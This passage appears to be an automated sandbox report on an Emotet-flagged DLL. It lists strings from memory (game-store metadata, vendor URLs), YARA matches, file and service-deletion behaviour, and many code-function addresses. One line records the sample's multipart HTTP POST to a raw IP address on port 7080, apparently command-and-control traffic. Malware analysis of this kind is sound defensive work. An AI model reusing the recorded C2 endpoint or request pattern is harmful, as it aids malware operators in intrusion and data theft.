M","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                    Source: svchost.exe, 0000000E.00000003.759319799.000001D9CB19C000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                    Source: unknownHTTP traffic detected: POST /2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/ HTTP/1.1DNT: 0Referer: 203.157.152.9/2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/Content-Type: multipart/form-data; boundary=---------FFexYarq3User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 203.157.152.9:7080Content-Length: 6212Connection: Keep-AliveCache-Control: no-cache
                    Source: svchost.exe, 0000000E.00000002.780274733.000001D9CB13C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: svchost.exe, 0000000E.00000002.780274733.000001D9CB13C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: svchost.exe, 0000000E.00000002.780274733.000001D9CB13C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: svchost.exe, 0000000E.00000002.780274733.000001D9CB13C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                    Source: svchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/privacy
                    Source: svchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/terms
                    Source: svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                    Source: svchost.exe, 0000000E.00000003.766254523.000001D9CB163000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766055144.000001D9CB16C000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                    Source: svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
                    Source: svchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/ca-privacy-rights
                    Source: svchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/do-not-sell-my-info
                    Source: svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                    Source: svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy

                    E-Banking Fraud:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: zGeK5so94c.dll, type: SAMPLE
                    Source: Yara matchFile source: 00000005.00000002.679972484.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.678150026.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.773552883.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.680588418.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 6.2.rundll32.exe.729e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.rundll32.exe.729e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.729e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.729e0000.1.unpack, type: UNPACKEDPE

                    System Summary:

                    barindex
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F545CE0 GetModuleFileNameW,PathFindFileNameW,OpenSCManagerW,OpenServiceW,DeleteService,CloseHandle,RegCreateKeyExW,RegDeleteValueW,CloseHandle,MoveFileW,ExitProcess,16_2_6F545CE0
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hbjpd\Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Hbjpd\usib.lxs:Zone.IdentifierJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FA0F14_2_729FA0F1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E64174_2_729E6417
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F4A9E4_2_729F4A9E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F10904_2_729F1090
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EDE814_2_729EDE81
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729ECAA34_2_729ECAA3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729ED2DD4_2_729ED2DD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FC6D94_2_729FC6D9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EA2D24_2_729EA2D2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EA6C94_2_729EA6C9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EECFE4_2_729EECFE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729ED6F04_2_729ED6F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FD4E14_2_729FD4E1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E54184_2_729E5418
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EE6124_2_729EE612
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E240F4_2_729E240F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E22084_2_729E2208
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E18064_2_729E1806
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F2C054_2_729F2C05
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F4C374_2_729F4C37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F8A334_2_729F8A33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F26314_2_729F2631
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FD02D4_2_729FD02D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F8C2B4_2_729F8C2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F02234_2_729F0223
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EA8214_2_729EA821
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F52504_2_729F5250
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E48444_2_729E4844
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EE0444_2_729EE044
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E327F4_2_729E327F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FAA7B4_2_729FAA7B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EBE744_2_729EBE74
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F06724_2_729F0672
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EBB964_2_729EBB96
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FC1924_2_729FC192
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E4D904_2_729E4D90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F35904_2_729F3590
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F0B8A4_2_729F0B8A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F1F884_2_729F1F88
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F71874_2_729F7187
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F9DBF4_2_729F9DBF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F7BBE4_2_729F7BBE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EF9BA4_2_729EF9BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EFFBA4_2_729EFFBA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F09B84_2_729F09B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F47B54_2_729F47B5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E3FAF4_2_729E3FAF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EADAF4_2_729EADAF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F93AA4_2_729F93AA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F2FA14_2_729F2FA1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E2DDF4_2_729E2DDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E57D44_2_729E57D4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FDBC44_2_729FDBC4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E7FFE4_2_729E7FFE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F1DFE4_2_729F1DFE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E35FC4_2_729E35FC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FBBF14_2_729FBBF1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E67EF4_2_729E67EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FCBE74_2_729FCBE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F6BE44_2_729F6BE4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EF5E04_2_729EF5E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FD70B4_2_729FD70B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E91064_2_729E9106
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E5F044_2_729E5F04
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F4F044_2_729F4F04
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E39384_2_729E3938
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E7B394_2_729E7B39
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E33364_2_729E3336
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FCF314_2_729FCF31
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E77314_2_729E7731
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E9D2F4_2_729E9D2F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EA5254_2_729EA525
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F3F4F4_2_729F3F4F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F434E4_2_729F434E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F9B4A4_2_729F9B4A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EC1454_2_729EC145
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E73784_2_729E7378
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E3B744_2_729E3B74
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EF3694_2_729EF369
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FA9664_2_729FA966
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EC3644_2_729EC364
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FB1654_2_729FB165
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F457F16_2_034F457F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EED7116_2_034EED71
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F53C016_2_034F53C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034ECDD816_2_034ECDD8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F9C7616_2_034F9C76
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E542D16_2_034E542D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E80E316_2_034E80E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F868416_2_034F8684
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EE2BE16_2_034EE2BE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E4F4C16_2_034E4F4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E754716_2_034E7547
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F9B5916_2_034F9B59
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EBD6C16_2_034EBD6C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EF96A16_2_034EF96A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034ED77E16_2_034ED77E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F030B16_2_034F030B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E7D0716_2_034E7D07
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EF10016_2_034EF100
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E8F1B16_2_034E8F1B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E2B2B16_2_034E2B2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E1D2B16_2_034E1D2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EAB2616_2_034EAB26
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E773B16_2_034E773B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F293816_2_034F2938
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E83CE16_2_034E83CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F19CB16_2_034F19CB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F83C916_2_034F83C9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F9DC416_2_034F9DC4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E5FD216_2_034E5FD2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F49EF16_2_034F49EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F8FE816_2_034F8FE8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E69FD16_2_034E69FD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E13FB16_2_034E13FB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E17FB16_2_034E17FB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EBFF416_2_034EBFF4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EA7F116_2_034EA7F1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E918D16_2_034E918D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EDB9E16_2_034EDB9E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EB39416_2_034EB394
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034FABAE16_2_034FABAE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E2FA716_2_034E2FA7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E43BC16_2_034E43BC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EF3B216_2_034EF3B2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034ECBB116_2_034ECBB1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F0E4916_2_034F0E49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E624816_2_034E6248
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EA05D16_2_034EA05D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F4C5516_2_034F4C55
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F346E16_2_034F346E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F066A16_2_034F066A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EEA6816_2_034EEA68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E5A6016_2_034E5A60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E3C7E16_2_034E3C7E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F9A7E16_2_034F9A7E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034FB07B16_2_034FB07B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F300F16_2_034F300F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E7E0C16_2_034E7E0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034ED40516_2_034ED405
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E3A0016_2_034E3A00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F961A16_2_034F961A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F242216_2_034F2422
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F082016_2_034F0820
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EC23216_2_034EC232
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EFEC216_2_034EFEC2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E64D816_2_034E64D8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F38D216_2_034F38D2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EF6E316_2_034EF6E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F368916_2_034F3689
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E7A8716_2_034E7A87
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E468516_2_034E4685
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F708316_2_034F7083
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F229F16_2_034F229F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F2C9716_2_034F2C97
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E229016_2_034E2290
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E40AB16_2_034E40AB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F12A316_2_034F12A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034FA6B216_2_034FA6B2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F541CE016_2_6F541CE0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F5497DF16_2_6F5497DF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F549D5016_2_6F549D50
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F54946D16_2_6F54946D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F556B7216_2_6F556B72
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F55732916_2_6F557329
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F5493C016_2_6F5493C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F549A8916_2_6F549A89
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F54698716_2_6F546987
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F54A00B16_2_6F54A00B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04489C7617_2_04489C76
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447542D17_2_0447542D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044780E317_2_044780E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447E2BE17_2_0447E2BE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04489B5917_2_04489B59
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447ED7117_2_0447ED71
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448457F17_2_0448457F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447D77E17_2_0447D77E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04477D0717_2_04477D07
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04472B2B17_2_04472B2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044853C017_2_044853C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044783CE17_2_044783CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447CDD817_2_0447CDD8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04480E4917_2_04480E49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447624817_2_04476248
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447A05D17_2_0447A05D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04484C5517_2_04484C55
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448066A17_2_0448066A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448346E17_2_0448346E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04475A6017_2_04475A60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447EA6817_2_0447EA68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448B07B17_2_0448B07B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04489A7E17_2_04489A7E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04473C7E17_2_04473C7E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447D40517_2_0447D405
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448300F17_2_0448300F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04473A0017_2_04473A00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04477E0C17_2_04477E0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448961A17_2_0448961A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448082017_2_04480820
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448242217_2_04482422
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447C23217_2_0447C232
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447FEC217_2_0447FEC2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044838D217_2_044838D2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044764D817_2_044764D8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447F6E317_2_0447F6E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04477A8717_2_04477A87
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448368917_2_04483689
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447468517_2_04474685
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448708317_2_04487083
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448868417_2_04488684
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448229F17_2_0448229F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447229017_2_04472290
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04482C9717_2_04482C97
